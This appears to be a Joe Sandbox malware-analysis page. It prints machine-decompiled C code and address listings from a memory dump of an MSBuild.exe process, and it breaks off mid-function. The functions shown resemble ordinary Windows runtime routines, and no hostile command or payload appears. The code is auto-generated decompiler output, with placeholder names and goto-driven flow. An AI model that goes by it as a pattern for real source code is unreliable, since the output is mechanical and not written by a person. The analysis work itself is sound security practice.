                                                                                                • Source File: 00000003.00000002.486523240.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                                                                                • Associated: 00000003.00000002.488171763.000000000119B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.488192191.000000000119F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_1080000_MSBuild.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: @
                                                                                                • API String ID: 0-2766056989
                                                                                                • Opcode ID: c000cdaf14d1f22c13811464d36741da5ae0f57c04d0af81a8ae1321744d58f5
                                                                                                • Instruction ID: 2bd4627fcffbcf5651b6920370a1b832495f0349e74bae29d780ba99079a5648
                                                                                                • Opcode Fuzzy Hash: c000cdaf14d1f22c13811464d36741da5ae0f57c04d0af81a8ae1321744d58f5
                                                                                                • Instruction Fuzzy Hash: C1319FB2508305AFC761DF68C9849AFBBE8FB99754F40492EF9D483290DA35DD04CB92
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 010B1B8F Relevance: 1.3, Strings: 1, Instructions: 86COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 72%
                                                                                                			E010B1B8F(void* __ecx, intOrPtr __edx, intOrPtr* _a4, signed int* _a8) {
				intOrPtr _v8;
				char _v16;
				intOrPtr* _t26;
				intOrPtr _t29;
				void* _t30;
				signed int _t31;

				_t27 = __ecx;
				_t29 = __edx;
				_t31 = 0;
				_v8 = __edx;
				if(__edx == 0) {
					L18:
					_t30 = 0xc000000d;
					goto L12;
				} else {
					_t26 = _a4;
					if(_t26 == 0 || _a8 == 0 || __ecx == 0) {
						goto L18;
					} else {
						E010EBB40(__ecx,  &_v16, __ecx);
						_push(_t26);
						_push(0);
						_push(0);
						_push(_t29);
						_push( &_v16);
						_t30 = E010EA9B0();
						if(_t30 >= 0) {
							_t19 =  *_t26;
							if( *_t26 != 0) {
								goto L7;
							} else {
								 *_a8 =  *_a8 & 0;
							}
						} else {
							if(_t30 != 0xc0000023) {
								L9:
								_push(_t26);
								_push( *_t26);
								_push(_t31);
								_push(_v8);
								_push( &_v16);
								_t30 = E010EA9B0();
								if(_t30 < 0) {
									L12:
									if(_t31 != 0) {
										L010C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t31);
									}
								} else {
									 *_a8 = _t31;
								}
							} else {
								_t19 =  *_t26;
								if( *_t26 == 0) {
									_t31 = 0;
								} else {
									L7:
									_t31 = L010C4620(_t27,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t19);
								}
								if(_t31 == 0) {
									_t30 = 0xc0000017;
								} else {
									goto L9;
								}
							}
						}
					}
				}
				return _t30;
			}









                                                                                                0x010b1b8f
                                                                                                0x010b1b9a
                                                                                                0x010b1b9c
                                                                                                0x010b1b9e
                                                                                                0x010b1ba3
                                                                                                0x01107010
                                                                                                0x01107010
                                                                                                0x00000000
                                                                                                0x010b1ba9
                                                                                                0x010b1ba9
                                                                                                0x010b1bae
                                                                                                0x00000000
                                                                                                0x010b1bc5
                                                                                                0x010b1bca
                                                                                                0x010b1bcf
                                                                                                0x010b1bd0
                                                                                                0x010b1bd1
                                                                                                0x010b1bd2
                                                                                                0x010b1bd6
                                                                                                0x010b1bdc
                                                                                                0x010b1be0
                                                                                                0x01106ffc
                                                                                                0x01107000
                                                                                                0x00000000
                                                                                                0x01107006
                                                                                                0x01107009
                                                                                                0x01107009
                                                                                                0x010b1be6
                                                                                                0x010b1bec
                                                                                                0x010b1c0b
                                                                                                0x010b1c0b
                                                                                                0x010b1c0c
                                                                                                0x010b1c11
                                                                                                0x010b1c12
                                                                                                0x010b1c15
                                                                                                0x010b1c1b
                                                                                                0x010b1c1f
                                                                                                0x010b1c31
                                                                                                0x010b1c33
                                                                                                0x01107026
                                                                                                0x01107026
                                                                                                0x010b1c21
                                                                                                0x010b1c24
                                                                                                0x010b1c24
                                                                                                0x010b1bee
                                                                                                0x010b1bee
                                                                                                0x010b1bf2
                                                                                                0x010b1c3a
                                                                                                0x010b1bf4
                                                                                                0x010b1bf4
                                                                                                0x010b1c05
                                                                                                0x010b1c05
                                                                                                0x010b1c09
                                                                                                0x010b1c3e
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x010b1c09
                                                                                                0x010b1bec
                                                                                                0x010b1be0
                                                                                                0x010b1bae
                                                                                                0x010b1c2e

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.486523240.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                                                                                • Associated: 00000003.00000002.488171763.000000000119B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.488192191.000000000119F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_1080000_MSBuild.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: WindowsExcludedProcs
                                                                                                • API String ID: 0-3583428290
                                                                                                • Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                                                                                • Instruction ID: 43e641f93f00e774d78f3b25b24300d4f59df4b040b36f5879c3699f5c8d23c8
                                                                                                • Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                                                                                • Instruction Fuzzy Hash: C021F836A0111DEBDB22DA59A894FDF7BADAF45A50F064565FA948B244D730DC00C7E0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 010CF716 Relevance: 1.3, Strings: 1, Instructions: 71COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 100%
                                                                                                			E010CF716(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
				intOrPtr _t13;
				intOrPtr _t14;
				signed int _t16;
				signed char _t17;
				intOrPtr _t19;
				intOrPtr _t21;
				intOrPtr _t23;
				intOrPtr* _t25;

				_t25 = _a8;
				_t17 = __ecx;
				if(_t25 == 0) {
					_t19 = 0xc00000f2;
					L8:
					return _t19;
				}
				if((__ecx & 0xfffffffe) != 0) {
					_t19 = 0xc00000ef;
					goto L8;
				}
				_t19 = 0;
				 *_t25 = 0;
				_t21 = 0;
				_t23 = "Actx ";
				if(__edx != 0) {
					if(__edx == 0xfffffffc) {
						L21:
						_t21 = 0x200;
						L5:
						_t13 =  *((intOrPtr*)( *[fs:0x30] + _t21));
						 *_t25 = _t13;
						L6:
						if(_t13 == 0) {
							if((_t17 & 0x00000001) != 0) {
								 *_t25 = _t23;
							}
						}
						L7:
						goto L8;
					}
					if(__edx == 0xfffffffd) {
						 *_t25 = _t23;
						_t13 = _t23;
						goto L6;
					}
					_t13 =  *((intOrPtr*)(__edx + 0x10));
					 *_t25 = _t13;
					L14:
					if(_t21 == 0) {
						goto L6;
					}
					goto L5;
				}
				_t14 = _a4;
				if(_t14 != 0) {
					_t16 =  *(_t14 + 0x14) & 0x00000007;
					if(_t16 <= 1) {
						_t21 = 0x1f8;
						_t13 = 0;
						goto L14;
					}
					if(_t16 == 2) {
						goto L21;
					}
					if(_t16 != 4) {
						_t19 = 0xc00000f0;
						goto L7;
					}
					_t13 = 0;
					goto L6;
				} else {
					_t21 = 0x1f8;
					goto L5;
				}
			}











                                                                                                0x010cf71d
                                                                                                0x010cf722
                                                                                                0x010cf726
                                                                                                0x01114770
                                                                                                0x010cf765
                                                                                                0x010cf769
                                                                                                0x010cf769
                                                                                                0x010cf732
                                                                                                0x0111477a
                                                                                                0x00000000
                                                                                                0x0111477a
                                                                                                0x010cf738
                                                                                                0x010cf73a
                                                                                                0x010cf73c
                                                                                                0x010cf73f
                                                                                                0x010cf746
                                                                                                0x010cf778
                                                                                                0x010cf7a9
                                                                                                0x010cf7a9
                                                                                                0x010cf754
                                                                                                0x010cf75a
                                                                                                0x010cf75d
                                                                                                0x010cf75f
                                                                                                0x010cf761
                                                                                                0x010cf76f
                                                                                                0x010cf771
                                                                                                0x010cf771
                                                                                                0x010cf76f
                                                                                                0x010cf763
                                                                                                0x00000000
                                                                                                0x010cf763
                                                                                                0x010cf77d
                                                                                                0x010cf7a3
                                                                                                0x010cf7a5
                                                                                                0x00000000
                                                                                                0x010cf7a5
                                                                                                0x010cf77f
                                                                                                0x010cf782
                                                                                                0x010cf784
                                                                                                0x010cf786
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x010cf788
                                                                                                0x010cf748
                                                                                                0x010cf74d
                                                                                                0x010cf78d
                                                                                                0x010cf793
                                                                                                0x010cf7b7
                                                                                                0x010cf7bc
                                                                                                0x00000000
                                                                                                0x010cf7bc
                                                                                                0x010cf798
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x010cf79d
                                                                                                0x010cf7b0
                                                                                                0x00000000
                                                                                                0x010cf7b0
                                                                                                0x010cf79f
                                                                                                0x00000000
                                                                                                0x010cf74f
                                                                                                0x010cf74f
                                                                                                0x00000000
                                                                                                0x010cf74f

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.486523240.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                                                                                • Associated: 00000003.00000002.488171763.000000000119B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.488192191.000000000119F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_1080000_MSBuild.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: Actx
                                                                                                • API String ID: 0-89312691
                                                                                                • Opcode ID: 4bdb4db88ce8515719b5ffeb718d830b50b8b89b4f8e950b0ef86db24c218335
                                                                                                • Instruction ID: 375f5a1ff913bf910a5c8fcbc73090d7a1945301433668863fd0f54783544716
                                                                                                • Opcode Fuzzy Hash: 4bdb4db88ce8515719b5ffeb718d830b50b8b89b4f8e950b0ef86db24c218335
                                                                                                • Instruction Fuzzy Hash: D7117C35304A038BEB694F1D889462E76D7BB85E64F24476EE5E1CB791DB60C8418B42
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 01158DF1 Relevance: 1.3, Strings: 1, Instructions: 45COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 71%
                                                                                                			E01158DF1(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				void* _t41;

				_t40 = __esi;
				_t39 = __edi;
				_t38 = __edx;
				_t35 = __ecx;
				_t34 = __ebx;
				_push(0x74);
				_push(0x1180d50);
				E010FD0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t41 - 0x7c)) = __edx;
				 *((intOrPtr*)(_t41 - 0x74)) = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 2)) != 0 || ( *0x7ffe02d4 & 0 | ( *0x7ffe02d4 & 0x00000003) == 0x00000003) != 0) {
					E01135720(0x65, 0, "Critical error detected %lx\n", _t35);
					if( *((intOrPtr*)(_t41 + 8)) != 0) {
						 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
						asm("int3");
						 *(_t41 - 4) = 0xfffffffe;
					}
				}
				 *(_t41 - 4) = 1;
				 *((intOrPtr*)(_t41 - 0x70)) =  *((intOrPtr*)(_t41 - 0x74));
				 *((intOrPtr*)(_t41 - 0x6c)) = 1;
				 *(_t41 - 0x68) =  *(_t41 - 0x68) & 0x00000000;
				 *((intOrPtr*)(_t41 - 0x64)) = E010FDEF0;
				 *((intOrPtr*)(_t41 - 0x60)) = 1;
				 *((intOrPtr*)(_t41 - 0x5c)) =  *((intOrPtr*)(_t41 - 0x7c));
				_push(_t41 - 0x70);
				E010FDEF0(1, _t38);
				 *(_t41 - 4) = 0xfffffffe;
				return E010FD130(_t34, _t39, _t40);
			}





                                                                                                0x01158df1
                                                                                                0x01158df1
                                                                                                0x01158df1
                                                                                                0x01158df1
                                                                                                0x01158df1
                                                                                                0x01158df1
                                                                                                0x01158df3
                                                                                                0x01158df8
                                                                                                0x01158dfd
                                                                                                0x01158e00
                                                                                                0x01158e0e
                                                                                                0x01158e2a
                                                                                                0x01158e36
                                                                                                0x01158e38
                                                                                                0x01158e3c
                                                                                                0x01158e46
                                                                                                0x01158e46
                                                                                                0x01158e36
                                                                                                0x01158e50
                                                                                                0x01158e56
                                                                                                0x01158e59
                                                                                                0x01158e5c
                                                                                                0x01158e60
                                                                                                0x01158e67
                                                                                                0x01158e6d
                                                                                                0x01158e73
                                                                                                0x01158e74
                                                                                                0x01158eb1
                                                                                                0x01158ebd

                                                                                                Strings
                                                                                                • Critical error detected %lx, xrefs: 01158E21
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.486523240.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                                                                                • Associated: 00000003.00000002.488171763.000000000119B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.488192191.000000000119F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_1080000_MSBuild.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: Critical error detected %lx
                                                                                                • API String ID: 0-802127002
                                                                                                • Opcode ID: 694b66a05fe8a13a9a60bae20e2388f3097320b39f092f2e4df19c885548c9ee
                                                                                                • Instruction ID: f339370d2c8cf809f91f9503406526cd0f0df8933a3cd6fad678113400aa7ff3
                                                                                                • Opcode Fuzzy Hash: 694b66a05fe8a13a9a60bae20e2388f3097320b39f092f2e4df19c885548c9ee
                                                                                                • Instruction Fuzzy Hash: 72115B71D54348DADF29DFA985067DCBBB0FB14314F20425DE5696B292C3340601DF14
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 01175BA5 Relevance: .6, Instructions: 592COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 88%
                                                                                                			E01175BA5(void* __ebx, signed char __ecx, signed int* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t296;
				signed char _t298;
				signed int _t301;
				signed int _t306;
				signed int _t310;
				signed char _t311;
				intOrPtr _t312;
				signed int _t313;
				void* _t327;
				signed int _t328;
				intOrPtr _t329;
				intOrPtr _t333;
				signed char _t334;
				signed int _t336;
				void* _t339;
				signed int _t340;
				signed int _t356;
				signed int _t362;
				short _t367;
				short _t368;
				short _t373;
				signed int _t380;
				void* _t382;
				short _t385;
				signed short _t392;
				signed char _t393;
				signed int _t395;
				signed char _t397;
				signed int _t398;
				signed short _t402;
				void* _t406;
				signed int _t412;
				signed char _t414;
				signed short _t416;
				signed int _t421;
				signed char _t427;
				intOrPtr _t434;
				signed char _t435;
				signed int _t436;
				signed int _t442;
				signed int _t446;
				signed int _t447;
				signed int _t451;
				signed int _t453;
				signed int _t454;
				signed int _t455;
				intOrPtr _t456;
				intOrPtr* _t457;
				short _t458;
				signed short _t462;
				signed int _t469;
				intOrPtr* _t474;
				signed int _t475;
				signed int _t479;
				signed int _t480;
				signed int _t481;
				short _t485;
				signed int _t491;
				signed int* _t494;
				signed int _t498;
				signed int _t505;
				intOrPtr _t506;
				signed short _t508;
				signed int _t511;
				void* _t517;
				signed int _t519;
				signed int _t522;
				void* _t523;
				signed int _t524;
				void* _t528;
				signed int _t529;

				_push(0xd4);
				_push(0x1181178);
				E010FD0E8(__ebx, __edi, __esi);
				_t494 = __edx;
				 *(_t528 - 0xcc) = __edx;
				_t511 = __ecx;
				 *((intOrPtr*)(_t528 - 0xb4)) = __ecx;
				 *(_t528 - 0xbc) = __ecx;
				 *((intOrPtr*)(_t528 - 0xc8)) =  *((intOrPtr*)(_t528 + 0x20));
				_t434 =  *((intOrPtr*)(_t528 + 0x24));
				 *((intOrPtr*)(_t528 - 0xc4)) = _t434;
				_t427 = 0;
				 *(_t528 - 0x74) = 0;
				 *(_t528 - 0x9c) = 0;
				 *(_t528 - 0x84) = 0;
				 *(_t528 - 0xac) = 0;
				 *(_t528 - 0x88) = 0;
				 *(_t528 - 0xa8) = 0;
				 *((intOrPtr*)(_t434 + 0x40)) = 0;
				if( *(_t528 + 0x1c) <= 0x80) {
					__eflags =  *(__ecx + 0xc0) & 0x00000004;
					if(__eflags != 0) {
						_t421 = E01174C56(0, __edx, __ecx, __eflags);
						__eflags = _t421;
						if(_t421 != 0) {
							 *((intOrPtr*)(_t528 - 4)) = 0;
							E010ED000(0x410);
							 *(_t528 - 0x18) = _t529;
							 *(_t528 - 0x9c) = _t529;
							 *((intOrPtr*)(_t528 - 4)) = 0xfffffffe;
							E01175542(_t528 - 0x9c, _t528 - 0x84);
						}
					}
					_t435 = _t427;
					 *(_t528 - 0xd0) = _t435;
					_t474 = _t511 + 0x65;
					 *((intOrPtr*)(_t528 - 0x94)) = _t474;
					_t511 = 0x18;
					while(1) {
						 *(_t528 - 0xa0) = _t427;
						 *(_t528 - 0xbc) = _t427;
						 *(_t528 - 0x80) = _t427;
						 *(_t528 - 0x78) = 0x50;
						 *(_t528 - 0x79) = _t427;
						 *(_t528 - 0x7a) = _t427;
						 *(_t528 - 0x8c) = _t427;
						 *(_t528 - 0x98) = _t427;
						 *(_t528 - 0x90) = _t427;
						 *(_t528 - 0xb0) = _t427;
						 *(_t528 - 0xb8) = _t427;
						_t296 = 1 << _t435;
						_t436 =  *(_t528 + 0xc) & 0x0000ffff;
						__eflags = _t436 & _t296;
						if((_t436 & _t296) != 0) {
							goto L92;
						}
						__eflags =  *((char*)(_t474 - 1));
						if( *((char*)(_t474 - 1)) == 0) {
							goto L92;
						}
						_t301 =  *_t474;
						__eflags = _t494[1] - _t301;
						if(_t494[1] <= _t301) {
							L10:
							__eflags =  *(_t474 - 5) & 0x00000040;
							if(( *(_t474 - 5) & 0x00000040) == 0) {
								L12:
								__eflags =  *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3];
								if(( *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3]) == 0) {
									goto L92;
								}
								_t442 =  *(_t474 - 0x11) & _t494[3];
								__eflags = ( *(_t474 - 0x15) & _t494[2]) -  *(_t474 - 0x15);
								if(( *(_t474 - 0x15) & _t494[2]) !=  *(_t474 - 0x15)) {
									goto L92;
								}
								__eflags = _t442 -  *(_t474 - 0x11);
								if(_t442 !=  *(_t474 - 0x11)) {
									goto L92;
								}
								L15:
								_t306 =  *(_t474 + 1) & 0x000000ff;
								 *(_t528 - 0xc0) = _t306;
								 *(_t528 - 0xa4) = _t306;
								__eflags =  *0x11960e8;
								if( *0x11960e8 != 0) {
									__eflags = _t306 - 0x40;
									if(_t306 < 0x40) {
										L20:
										asm("lock inc dword [eax]");
										_t310 =  *0x11960e8; // 0x0
										_t311 =  *(_t310 +  *(_t528 - 0xa4) * 8);
										__eflags = _t311 & 0x00000001;
										if((_t311 & 0x00000001) == 0) {
											 *(_t528 - 0xa0) = _t311;
											_t475 = _t427;
											 *(_t528 - 0x74) = _t427;
											__eflags = _t475;
											if(_t475 != 0) {
												L91:
												_t474 =  *((intOrPtr*)(_t528 - 0x94));
												goto L92;
											}
											asm("sbb edi, edi");
											_t498 = ( ~( *(_t528 + 0x18)) & _t511) + 0x50;
											_t511 = _t498;
											_t312 =  *((intOrPtr*)(_t528 - 0x94));
											__eflags =  *(_t312 - 5) & 1;
											if(( *(_t312 - 5) & 1) != 0) {
												_push(_t528 - 0x98);
												_push(0x4c);
												_push(_t528 - 0x70);
												_push(1);
												_push(0xfffffffa);
												_t412 = E010E9710();
												_t475 = _t427;
												__eflags = _t412;
												if(_t412 >= 0) {
													_t414 =  *(_t528 - 0x98) - 8;
													 *(_t528 - 0x98) = _t414;
													_t416 = _t414 + 0x0000000f & 0x0000fff8;
													 *(_t528 - 0x8c) = _t416;
													 *(_t528 - 0x79) = 1;
													_t511 = (_t416 & 0x0000ffff) + _t498;
													__eflags = _t511;
												}
											}
											_t446 =  *( *((intOrPtr*)(_t528 - 0x94)) - 5);
											__eflags = _t446 & 0x00000004;
											if((_t446 & 0x00000004) != 0) {
												__eflags =  *(_t528 - 0x9c);
												if( *(_t528 - 0x9c) != 0) {
													 *(_t528 - 0x7a) = 1;
													_t511 = _t511 + ( *(_t528 - 0x84) & 0x0000ffff);
													__eflags = _t511;
												}
											}
											_t313 = 2;
											_t447 = _t446 & _t313;
											__eflags = _t447;
											 *(_t528 - 0xd4) = _t447;
											if(_t447 != 0) {
												_t406 = 0x10;
												_t511 = _t511 + _t406;
												__eflags = _t511;
											}
											_t494 = ( *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) << 4) +  *((intOrPtr*)(_t528 - 0xc4));
											 *(_t528 - 0x88) = _t427;
											__eflags =  *(_t528 + 0x1c);
											if( *(_t528 + 0x1c) <= 0) {
												L45:
												__eflags =  *(_t528 - 0xb0);
												if( *(_t528 - 0xb0) != 0) {
													_t511 = _t511 + (( *(_t528 - 0x90) & 0x0000ffff) + 0x0000000f & 0xfffffff8);
													__eflags = _t511;
												}
												__eflags = _t475;
												if(_t475 != 0) {
													asm("lock dec dword [ecx+edx*8+0x4]");
													goto L100;
												} else {
													_t494[3] = _t511;
													_t451 =  *(_t528 - 0xa0);
													_t427 = E010E6DE6(_t451, _t511,  *( *[fs:0x18] + 0xf77) & 0x000000ff, _t528 - 0xe0, _t528 - 0xbc);
													 *(_t528 - 0x88) = _t427;
													__eflags = _t427;
													if(_t427 == 0) {
														__eflags = _t511 - 0xfff8;
														if(_t511 <= 0xfff8) {
															__eflags =  *((intOrPtr*)( *(_t528 - 0xa0) + 0x90)) - _t511;
															asm("sbb ecx, ecx");
															__eflags = (_t451 & 0x000000e2) + 8;
														}
														asm("lock dec dword [eax+edx*8+0x4]");
														L100:
														goto L101;
													}
													_t453 =  *(_t528 - 0xa0);
													 *_t494 = _t453;
													_t494[1] = _t427;
													_t494[2] =  *(_t528 - 0xbc);
													 *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) =  *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) + 1;
													 *_t427 =  *(_t453 + 0x24) | _t511;
													 *(_t427 + 4) =  *((intOrPtr*)(_t528 + 0x10));
													 *((short*)(_t427 + 6)) =  *((intOrPtr*)(_t528 + 8));
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x14);
													if( *(_t528 + 0x14) == 0) {
														__eflags =  *[fs:0x18] + 0xf50;
													}
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													__eflags =  *(_t528 + 0x18);
													if( *(_t528 + 0x18) == 0) {
														_t454 =  *(_t528 - 0x80);
														_t479 =  *(_t528 - 0x78);
														_t327 = 1;
														__eflags = 1;
													} else {
														_t146 = _t427 + 0x50; // 0x50
														_t454 = _t146;
														 *(_t528 - 0x80) = _t454;
														_t382 = 0x18;
														 *_t454 = _t382;
														 *((short*)(_t454 + 2)) = 1;
														_t385 = 0x10;
														 *((short*)(_t454 + 6)) = _t385;
														 *(_t454 + 4) = 0;
														asm("movsd");
														asm("movsd");
														asm("movsd");
														asm("movsd");
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = 0x68;
														 *(_t528 - 0x78) = _t479;
													}
													__eflags =  *(_t528 - 0x79) - _t327;
													if( *(_t528 - 0x79) == _t327) {
														_t524 = _t479 + _t427;
														_t508 =  *(_t528 - 0x8c);
														 *_t524 = _t508;
														_t373 = 2;
														 *((short*)(_t524 + 2)) = _t373;
														 *((short*)(_t524 + 6)) =  *(_t528 - 0x98);
														 *((short*)(_t524 + 4)) = 0;
														_t167 = _t524 + 8; // 0x8
														E010EF3E0(_t167, _t528 - 0x68,  *(_t528 - 0x98));
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + (_t508 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t380 =  *(_t528 - 0x80);
														__eflags = _t380;
														if(_t380 != 0) {
															_t173 = _t380 + 4;
															 *_t173 =  *(_t380 + 4) | 1;
															__eflags =  *_t173;
														}
														_t454 = _t524;
														 *(_t528 - 0x80) = _t454;
														_t327 = 1;
														__eflags = 1;
													}
													__eflags =  *(_t528 - 0xd4);
													if( *(_t528 - 0xd4) == 0) {
														_t505 =  *(_t528 - 0x80);
													} else {
														_t505 = _t479 + _t427;
														_t523 = 0x10;
														 *_t505 = _t523;
														_t367 = 3;
														 *((short*)(_t505 + 2)) = _t367;
														_t368 = 4;
														 *((short*)(_t505 + 6)) = _t368;
														 *(_t505 + 4) = 0;
														 *((intOrPtr*)(_t505 + 8)) =  *((intOrPtr*)( *[fs:0x30] + 0x1d4));
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = _t479 + _t523;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t454;
														if(_t454 != 0) {
															_t186 = _t454 + 4;
															 *_t186 =  *(_t454 + 4) | 1;
															__eflags =  *_t186;
														}
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0x7a) - _t327;
													if( *(_t528 - 0x7a) == _t327) {
														 *(_t528 - 0xd4) = _t479 + _t427;
														_t522 =  *(_t528 - 0x84) & 0x0000ffff;
														E010EF3E0(_t479 + _t427,  *(_t528 - 0x9c), _t522);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + _t522;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t199 = _t505 + 4;
															 *_t199 =  *(_t505 + 4) | 1;
															__eflags =  *_t199;
														}
														_t505 =  *(_t528 - 0xd4);
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0xa8);
													if( *(_t528 - 0xa8) != 0) {
														_t356 = _t479 + _t427;
														 *(_t528 - 0xd4) = _t356;
														_t462 =  *(_t528 - 0xac);
														 *_t356 = _t462 + 0x0000000f & 0x0000fff8;
														_t485 = 0xc;
														 *((short*)(_t356 + 2)) = _t485;
														 *(_t356 + 6) = _t462;
														 *((short*)(_t356 + 4)) = 0;
														_t211 = _t356 + 8; // 0x9
														E010EF3E0(_t211,  *(_t528 - 0xa8), _t462 & 0x0000ffff);
														E010EFA60((_t462 & 0x0000ffff) + _t211, 0, (_t462 + 0x0000000f & 0x0000fff8) -  *(_t528 - 0xac) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0x18;
														_t427 =  *(_t528 - 0x88);
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t505 =  *(_t528 - 0xd4);
														_t479 =  *(_t528 - 0x78) + ( *_t505 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t362 =  *(_t528 - 0x80);
														__eflags = _t362;
														if(_t362 != 0) {
															_t222 = _t362 + 4;
															 *_t222 =  *(_t362 + 4) | 1;
															__eflags =  *_t222;
														}
													}
													__eflags =  *(_t528 - 0xb0);
													if( *(_t528 - 0xb0) != 0) {
														 *(_t479 + _t427) =  *(_t528 - 0x90) + 0x0000000f & 0x0000fff8;
														_t458 = 0xb;
														 *((short*)(_t479 + _t427 + 2)) = _t458;
														 *((short*)(_t479 + _t427 + 6)) =  *(_t528 - 0x90);
														 *((short*)(_t427 + 4 + _t479)) = 0;
														 *(_t528 - 0xb8) = _t479 + 8 + _t427;
														E010EFA60(( *(_t528 - 0x90) & 0x0000ffff) + _t479 + 8 + _t427, 0, ( *(_t528 - 0x90) + 0x0000000f & 0x0000fff8) -  *(_t528 - 0x90) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + ( *( *(_t528 - 0x78) + _t427) & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t241 = _t505 + 4;
															 *_t241 =  *(_t505 + 4) | 1;
															__eflags =  *_t241;
														}
													}
													_t328 =  *(_t528 + 0x1c);
													__eflags = _t328;
													if(_t328 == 0) {
														L87:
														_t329 =  *((intOrPtr*)(_t528 - 0xe0));
														 *((intOrPtr*)(_t427 + 0x10)) = _t329;
														_t455 =  *(_t528 - 0xdc);
														 *(_t427 + 0x14) = _t455;
														_t480 =  *(_t528 - 0xa0);
														_t517 = 3;
														__eflags =  *((intOrPtr*)(_t480 + 0x10)) - _t517;
														if( *((intOrPtr*)(_t480 + 0x10)) != _t517) {
															asm("rdtsc");
															 *(_t427 + 0x3c) = _t480;
														} else {
															 *(_t427 + 0x3c) = _t455;
														}
														 *((intOrPtr*)(_t427 + 0x38)) = _t329;
														_t456 =  *[fs:0x18];
														 *((intOrPtr*)(_t427 + 8)) =  *((intOrPtr*)(_t456 + 0x24));
														 *((intOrPtr*)(_t427 + 0xc)) =  *((intOrPtr*)(_t456 + 0x20));
														_t427 = 0;
														__eflags = 0;
														_t511 = 0x18;
														goto L91;
													} else {
														_t519 =  *((intOrPtr*)(_t528 - 0xc8)) + 0xc;
														__eflags = _t519;
														 *(_t528 - 0x8c) = _t328;
														do {
															_t506 =  *((intOrPtr*)(_t519 - 4));
